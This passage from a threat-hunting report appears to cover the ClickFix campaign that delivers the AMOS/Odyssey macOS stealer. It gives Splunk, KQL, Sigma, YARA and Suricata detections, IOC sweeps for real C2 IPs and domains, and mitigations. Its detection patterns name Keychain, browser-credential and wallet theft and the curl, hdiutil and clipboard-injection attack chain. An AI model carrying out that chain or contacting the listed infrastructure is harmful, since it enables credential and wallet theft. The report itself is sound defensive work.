    - attack.t1059.004

Attribution: RedSheep Security/Stone (original)

On macOS, focus on the sequence: curl download → hdiutil attach → open .app. Legitimate developers may use hdiutil from Terminal, but the combination with curl downloading from external domains is unusual. Enrich with DNS data to check if the download domain is newly registered or has a suspicious TLD.

T1115 — Clipboard Data (Collection) [P2]

ClickFix uses JavaScript clipboard injection (navigator.clipboard.writeText() or document.execCommand('copy')) to silently load malicious commands into the victim's clipboard. The victim then pastes these commands into Terminal or Run dialog. Note: T1115 formally covers clipboard data collection; ClickFix uses clipboard writing/injection, which is the closest available ATT&CK mapping.

Splunk SPL:

index=proxy (uri_path="*captcha*" OR uri_path="*verify*" OR uri_path="*check*") (dest_host="*.beer" OR dest_host="*.top" OR dest_host="*.xyz" OR dest_host="*.info") | stats count by src_ip, dest_host, uri_path, http_user_agent | where count > 0 | table src_ip, dest_host, uri_path, http_user_agent, count

Elastic KQL:

url.path:(*captcha* OR *verify* OR *check*) AND url.domain:(*beer OR *top OR *xyz OR *info)

Sigma Rule:

title: ClickFix - MSHTA Execution from Explorer Parent Process
id: d4e5f6a7-b8c9-0123-defa-456789012345
status: experimental
author: RedSheep Security/Stone
date: 2026/06/25
description: Detects mshta.exe spawned from explorer.exe, a known ClickFix Windows execution path where clipboard-injected mshta commands are pasted into the Run dialog.
references:
    - https://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith: '\explorer.exe'
        Image|endswith: '\mshta.exe'
    condition: selection
falsepositives:
    - Rare legitimate use of mshta.exe from Run dialog
level: critical
tags:
    - attack.execution
    - attack.defense_evasion
    - attack.t1218.005

Attribution: RedSheep Security/Stone (original)

Clipboard injection is difficult to detect at the endpoint level. Focus on proxy/DNS detections for fake CAPTCHA pages and process lineage detections as downstream indicators. Some EDRs (CrowdStrike, SentinelOne) may be able to log clipboard API calls from browser processes — check vendor-specific capabilities.

T1555 — Credentials from Password Stores (Credential Access) [P2]

The AMOS/Odyssey stealer payload targets Apple Keychain data, browser stored credentials, and cryptocurrency wallet data. On macOS, this involves reading Keychain databases, browser profile directories (Chrome, Firefox, Safari), and crypto wallet application data. The malware also replaces legitimate cryptocurrency wallet applications with trojanized versions.

Splunk SPL:

index=macos_edr (file_path="*Keychain*" OR file_path="*Chrome/Default/Login Data*" OR file_path="*Firefox/Profiles*" OR file_path="*wallet*" OR file_path="*exodus*" OR file_path="*metamask*" OR file_path="*phantom*" OR file_path="*coinbase*") process_name!="Safari" process_name!="Chrome" process_name!="Firefox" process_name!="Google Chrome" | stats count by host, user, process_name, file_path | table host, user, process_name, file_path, count

Elastic KQL:

file.path:(*Keychain* OR *Login\ Data* OR *Firefox\/Profiles* OR *wallet* OR *exodus* OR *metamask*) AND NOT process.name:("Safari" OR "Chrome" OR "Firefox" OR "Google Chrome")

Sigma Rule:

title: AMOS Stealer - Suspicious Access to Browser Credential and Wallet Files on macOS
id: e5f6a7b8-c9d0-1234-efab-567890123456
status: experimental
author: RedSheep Security/Stone
date: 2026/06/25
description: Detects non-browser processes accessing browser credential stores, Apple Keychain, or cryptocurrency wallet data — indicators of AMOS/Odyssey infostealer activity.
references:
    - https://www.bleepingcomputer.com/news/security/new-macos-clickfix-attack-silently-mounts-dmgs-to-push-infostealer/
logsource:
    category: file_access
    product: macos
detection:
    selection_files:
        TargetFilename|contains:
            - 'Keychain'
            - 'Login Data'
            - 'cookies.sqlite'
            - 'logins.json'
            - 'wallet'
            - 'exodus'
            - 'metamask'
    filter_browsers:
        Image|contains:
            - 'Safari'
            - 'Chrome'
            - 'Firefox'
            - 'Brave'
            - 'Edge'
    condition: selection_files and not filter_browsers
falsepositives:
    - Legitimate backup or synchronization tools accessing browser profiles
    - Security scanning tools
level: high
tags:
    - attack.credential_access
    - attack.t1555

Attribution: RedSheep Security/Stone (original)

This detection focuses on the credential/wallet harvesting behavior of AMOS stealer. On macOS, look for unauthorized processes reading Keychain databases or browser profile directories. Also monitor for crypto wallet .app bundles being replaced or modified, which indicates the trojanization behavior reported by Microsoft.

T1041 — Exfiltration Over C2 Channel (Exfiltration) [P1]

The AMOS/Odyssey stealer exfiltrates collected credentials, wallet data, Keychain data, and documents to attacker-controlled C2 infrastructure. Reported C2 server is 196.251.107[.]171 on port 3000, with domain fewfwfwfwfwf[.]info used for C2 communications.

Splunk SPL:

index=firewall OR index=proxy (dest_ip="196.251.107.171" OR dest="196.251.107.171" OR dest_ip="178.16.52.101" OR dest="178.16.52.101") | stats count earliest(_time) as first_seen latest(_time) as last_seen values(src_ip) as source_ips values(dest_port) as dest_ports by dest_ip | table dest_ip, source_ips, dest_ports, count, first_seen, last_seen

Elastic KQL:

destination.ip:("196.251.107.171" OR "178.16.52.101") OR dns.question.name:("svs-verificationdate.beer" OR "fewfwfwfwfwf.info")

Sigma Rule:

title: ClickFix macOS Campaign - Known C2 Communication
id: f6a7b8c9-d0e1-2345-fabc-678901234567
status: experimental
author: RedSheep Security/Stone
date: 2026/06/25
description: Detects network connections to known C2 infrastructure associated with the macOS ClickFix AMOS stealer campaign reported by Unit 42.
references:
    - https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2026-06-20-ClickFix-campaign-delivers-macOS-infostealer-via-DMG.txt
logsource:
    category: network_connection
    product: any
detection:
    selection_ip:
        DestinationIp:
            - '196.251.107.171'
            - '178.16.52.101'
    selection_domain:
        DestinationHostname|contains:
            - 'svs-verificationdate.beer'
            - 'fewfwfwfwfwf.info'
    condition: selection_ip or selection_domain
falsepositives:
    - Unlikely — these are known malicious indicators
level: critical
tags:
    - attack.command_and_control
    - attack.exfiltration
    - attack.t1041

Attribution: RedSheep Security/Stone (original)

Direct IOC match — any hit should be treated as P1 and immediately investigated. Note the C2 server uses port 3000, which is unusual and may stand out in network traffic analysis. Also monitor for outbound connections to unusual ports from macOS hosts.

T1539 — Steal Web Session Cookie (Credential Access) [P2]

AMOS stealer harvests browser session cookies from Chrome, Firefox, Safari and other browsers to enable session hijacking of active web sessions.

Splunk SPL:

index=sysmon EventCode=11 (TargetFilename="*Cookies*" OR TargetFilename="*cookies.sqlite*" OR TargetFilename="*Cookie*") | where NOT match(Image, "(?i)(chrome|firefox|safari|brave|edge|msedge)") | stats count by ComputerName, User, Image, TargetFilename | table ComputerName, User, Image, TargetFilename, count

Elastic KQL:

file.path:(*Cookies* OR *cookies.sqlite*) AND NOT process.name:("chrome" OR "firefox" OR "safari" OR "msedge" OR "brave")

Cookie theft is a secondary indicator. Focus on non-browser processes accessing cookie stores. Combine with process lineage data to correlate with ClickFix execution chain.

T1005 — Data from Local System (Collection) [P3]

AMOS stealer harvests user documents, messaging app data, and other local files of interest. The malware performs broad data collection from the user's home directory.

Splunk SPL:

index=macos_edr event_type="file_read" (file_path="*/Documents/*" OR file_path="*/Desktop/*" OR file_path="*/Downloads/*") | stats dc(file_path) as files_accessed count by host, user, process_name, process_path | where files_accessed > 50 | sort -files_accessed | table host, user, process_name, process_path, files_accessed, count

Elastic KQL:

event.action:"open" AND file.path:(*Documents* OR *Desktop* OR *Downloads*) AND event.category:"file"

Broad file collection generates noise. Focus on processes accessing a high volume of files across multiple sensitive directories in a short timeframe, especially from unsigned or unknown processes on macOS.

Indicators of Compromise

IOC Sweep Queries (Splunk):

index=dns (query="*svs-verificationdate.beer*" OR query="*svs-verificationdate*") | stats count earliest(_time) as first_seen latest(_time) as last_seen values(src_ip) as source_ips by query | table query, source_ips, count, first_seen, last_seen

index=dns (query="*fewfwfwfwfwf.info*" OR query="*fewfwfwfwfwf*") | stats count earliest(_time) as first_seen latest(_time) as last_seen values(src_ip) as source_ips by query | table query, source_ips, count, first_seen, last_seen

index=firewall OR index=proxy OR index=dns (dest_ip="178.16.52.101" OR dest="178.16.52.101" OR answer="178.16.52.101") | stats count earliest(_time) as first_seen latest(_time) as last_seen values(src_ip) as source_ips values(dest_port) as dest_ports by dest_ip | table dest_ip, source_ips, dest_ports, count, first_seen, last_seen

index=firewall OR index=proxy OR index=dns (dest_ip="196.251.107.171" OR dest="196.251.107.171" OR answer="196.251.107.171") | stats count earliest(_time) as first_seen latest(_time) as last_seen values(src_ip) as source_ips values(dest_port) as dest_ports by dest_ip | table dest_ip, source_ips, dest_ports, count, first_seen, last_seen

index=proxy OR index=sysmon OR index=edr ("f0038a5f46720da5982b6984ceef10cf99359432e102b12a0b0657498d36f670") | stats count earliest(_time) as first_seen latest(_time) as last_seen values(src_ip) as source_ips by sourcetype | table sourcetype, source_ips, count, first_seen, last_seen

YARA Rules

clickfix_macos_amos_stealer_indicators — Detects indicators of the AMOS/Odyssey macOS stealer deployed via ClickFix campaigns, including known C2 domains, staging infrastructure, and characteristic command patterns used in the clipboard-injected payload.

rule clickfix_macos_amos_stealer_indicators {
    meta:
        author = "RedSheep Security/Stone"
        description = "Detects indicators associated with ClickFix macOS AMOS/Odyssey stealer campaign — C2 domains, staging infrastructure, and command patterns"
        reference = "https://www.bleepingcomputer.com/news/security/new-macos-clickfix-attack-silently-mounts-dmgs-to-push-infostealer/"
        date = "2026-06-25"
        threat_name = "AMOS/Odyssey Stealer via ClickFix"
    strings:
        $domain1 = "svs-verificationdate.beer" ascii wide nocase
        $domain2 = "fewfwfwfwfwf.info" ascii wide nocase
        $ip1 = "196.251.107.171" ascii wide
        $ip2 = "178.16.52.101" ascii wide
        $cmd_hdiutil = "hdiutil attach" ascii wide nocase
        $cmd_curl_dmg = ".dmg" ascii wide nocase
        $cmd_open_app = "open " ascii wide
        $hash_path = "f0038a5f46720da5982b6984ceef10cf99359432e102b12a0b0657498d36f670" ascii wide
        $keychain_access = "Keychain" ascii wide
        $wallet_exodus = "exodus" ascii wide nocase
        $wallet_metamask = "metamask" ascii wide nocase
    condition:
        any of ($domain1, $domain2, $ip1, $ip2, $hash_path) or
        (3 of ($cmd_hdiutil, $cmd_curl_dmg, $cmd_open_app, $keychain_access, $wallet_exodus, $wallet_metamask))
}

Attribution: RedSheep Security/Stone (original)

clickfix_clipboard_injection_html — Detects HTML/JavaScript pages used for ClickFix clipboard injection attacks — identifies fake CAPTCHA/verification pages that use clipboard write APIs to inject malicious commands.

rule clickfix_clipboard_injection_html {
    meta:
        author = "RedSheep Security/Stone"
        description = "Detects HTML pages using clipboard write APIs combined with social engineering text patterns characteristic of ClickFix attacks"
        reference = "https://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn"
        date = "2026-06-25"
    strings:
        $clipboard_api1 = "navigator.clipboard.writeText" ascii wide nocase
        $clipboard_api2 = "document.execCommand('copy')" ascii wide nocase
        $clipboard_api3 = "document.execCommand(\"copy\")" ascii wide nocase
        $social_eng1 = "Win+R" ascii wide nocase
        $social_eng2 = "Ctrl+V" ascii wide nocase
        $social_eng3 = "paste" ascii wide nocase
        $social_eng4 = "Terminal" ascii wide nocase
        $social_eng5 = "verification" ascii wide nocase
        $social_eng6 = "captcha" ascii wide nocase
        $social_eng7 = "I am not a robot" ascii wide nocase
        $cmd_ps = "powershell" ascii wide nocase
        $cmd_mshta = "mshta" ascii wide nocase
        $cmd_curl = "curl" ascii wide nocase
        $cmd_hdiutil = "hdiutil" ascii wide nocase
    condition:
        filesize < 500KB and
        any of ($clipboard_api*) and
        2 of ($social_eng*) and
        any of ($cmd_*)
}

Attribution: RedSheep Security/Stone (original)

Suricata Rules

SID 2026001 — Detects DNS lookup for svs-verificationdate[.]beer — ClickFix macOS AMOS stealer staging domain

alert dns $HOME_NET any -> any 53 (msg:"ET TROJAN ClickFix AMOS Stealer Staging Domain (svs-verificationdate.beer)"; dns.query; content:"svs-verificationdate"; content:"beer"; distance:0; reference:url,www.bleepingcomputer.com/news/security/new-macos-clickfix-attack-silently-mounts-dmgs-to-push-infostealer/; classtype:trojan-activity; sid:2026001; rev:1; metadata:created_at 2026_06_25;)

Attribution: RedSheep Security/Stone (original)

SID 2026002 — Detects DNS lookup for fewfwfwfwfwf[.]info — ClickFix macOS AMOS stealer C2 domain

alert dns $HOME_NET any -> any 53 (msg:"ET TROJAN ClickFix AMOS Stealer C2 Domain (fewfwfwfwfwf.info)"; dns.query; content:"fewfwfwfwfwf"; content:"info"; distance:0; reference:url,github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2026-06-20-ClickFix-campaign-delivers-macOS-infostealer-via-DMG.txt; classtype:trojan-activity; sid:2026002; rev:1; metadata:created_at 2026_06_25;)

Attribution: RedSheep Security/Stone (original)

SID 2026003 — Detects outbound TCP connection to 196.251.107.171 port 3000 — ClickFix AMOS stealer C2 server

alert tcp $HOME_NET any -> 196.251.107.171 3000 (msg:"ET TROJAN ClickFix AMOS Stealer C2 Connection (196.251.107.171:3000)"; flow:established,to_server; reference:url,github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2026-06-20-ClickFix-campaign-delivers-macOS-infostealer-via-DMG.txt; classtype:trojan-activity; sid:2026003; rev:1; metadata:created_at 2026_06_25;)

Attribution: RedSheep Security/Stone (original)

SID 2026004 — Detects outbound connection to 178.16.52.101 — ClickFix AMOS stealer staging IP for DMG download

alert tcp $HOME_NET any -> 178.16.52.101 any (msg:"ET TROJAN ClickFix AMOS Stealer Staging IP (178.16.52.101)"; flow:established,to_server; reference:url,github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2026-06-20-ClickFix-campaign-delivers-macOS-infostealer-via-DMG.txt; classtype:trojan-activity; sid:2026004; rev:1; metadata:created_at 2026_06_25;)

Attribution: RedSheep Security/Stone (original)

SID 2026005 — Detects HTTP request containing .dmg file download — potential macOS ClickFix payload delivery

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET POLICY Potential macOS ClickFix DMG Download from Suspicious TLD"; flow:established,to_server; http.uri; content:".dmg"; http.host; pcre:"/\.(beer|top|xyz|info|club|site|online|fun)$/"; classtype:policy-violation; sid:2026005; rev:1; metadata:created_at 2026_06_25;)

Attribution: RedSheep Security/Stone (original)

Data Source Requirements

Mitigations & Recommendations

Curated baseline: Kimsuky; library archetype

The curated Kimsuky playbook covers spearphishing-driven foothold analysis, persistence hunts, mailbox tampering, browser credential theft, and standard containment (host isolation, password reset, ZAP). It does NOT cover the ClickFix social engineering primitive (user-as-execution-engine via clipboard injection), macOS execution paths (Terminal/curl/hdiutil/DMG), Apple Keychain and crypto wallet theft, browser session cookie theft for session hijacking, or the run-dialog/clipboard paste behavior on Windows.

Established mitigations (curated):

• Isolate compromised host at EDR.
• Reset user password; revoke sessions.
• ZAP/purge the phishing email from all mailboxes.
• Block sender infrastructure (domains, IPs, email patterns).
• Remove any inbox rules or delegate permissions attacker set.

Established detection guidance (curated):

• Review the phishing email: impersonated identity, lure theme, delivery method.
• Identify all recipients of the same lure.
• Check for clickers / attachment executors.
• Endpoint hunt on clickers: LNK execution, macro-doc execution, PowerShell post-click.
• Credential access / browser credential theft hunt (Kimsuky steals browser creds).
• DMARC audit: how poorly is our own and partner domain DMARC configured (CISA AA23-271A guidance)?

Net-new from this incident:

• Add a macOS coverage track to the playbook: AMOS/Odyssey stealer artifacts (Keychain, ~/Library/Application Support, hdiutil/DMG mount chains) — the curated playbook is Windows-centric.
• Update user awareness training to specifically warn against pasting commands into Terminal, Run dialog, or PowerShell from web prompts (fake CAPTCHA/verification), which existing phishing training does not cover.
• Treat session cookie theft as a first-class containment concern: always revoke IdP sessions and OAuth refresh tokens on suspected stealer infections, not just rotate passwords.
• Build detections for the 'explorer.exe → powershell.exe' and 'Terminal → curl|hdiutil|open' parent-child chains as high-fidelity ClickFix indicators.
• Note that Kimsuky (TA427) has been observed adopting ClickFix; the curated playbook's phishing-only foothold assumption should be expanded to include browser-lure ClickFix as a Kimsuky delivery vector.
• Revoke all active OAuth/SaaS/M365 session tokens (not just password reset) for impacted users to defeat stolen session cookies. (Why: T1539 — stolen session cookies allow MFA-bypassed access; password reset alone insufficient.)
• On compromised macOS hosts, force Keychain password rotation and revoke any stored OAuth refresh tokens; rotate crypto wallet seeds if wallet files were accessed. (Why: T1555 — AMOS exfiltrates Keychain contents and wallet data.)
• Block C2 IP 196.251.107.171 and associated infrastructure at perimeter and DNS. (Why: T1041 — known AMOS exfiltration endpoint.)
• Deploy browser/endpoint policy to disable or alert on Run dialog (Win+R) command execution patterns and clipboard-paste-to-Terminal on managed macOS endpoints. (Why: T1204.002 / T1115 — interrupt ClickFix user-as-execution mechanic.)
• Detect: Identify whether any user opened the Windows Run dialog (explorer.exe spawning powershell.exe/cmd.exe with no parent document) or macOS Terminal.app shortly after browsing a suspicious page. (Why: T1204.002 / T1059.001 / T1059.004 — ClickFix relies on user pasting attacker commands into Run dialog or Terminal.)
• Detect: Review browser history for fake CAPTCHA, 'verify you are human', or fake error/update overlay pages preceding suspicious shell activity. (Why: T1115 — ClickFix delivery vector is browser-based clipboard hijack via fake prompts.)
• Detect: On macOS endpoints, hunt for hdiutil mount of DMGs downloaded via curl, and subsequent 'open' of apps from /Volumes. (Why: T1059.004 — macOS ClickFix variant uses curl + hdiutil + open to deploy AMOS.)

Sources

• BleepingComputer - New macOS ClickFix attack silently mounts DMGs to push infostealer
• Proofpoint - Clipboard Compromise: PowerShell Self-Pwn (ClickFix initial documentation)
• Proofpoint - Around the World in 90 Days: State-Sponsored Actors Try ClickFix
• Unit 42 (Palo Alto Networks) - ClickFix campaign delivers macOS infostealer via DMG (Timely Threat Intel)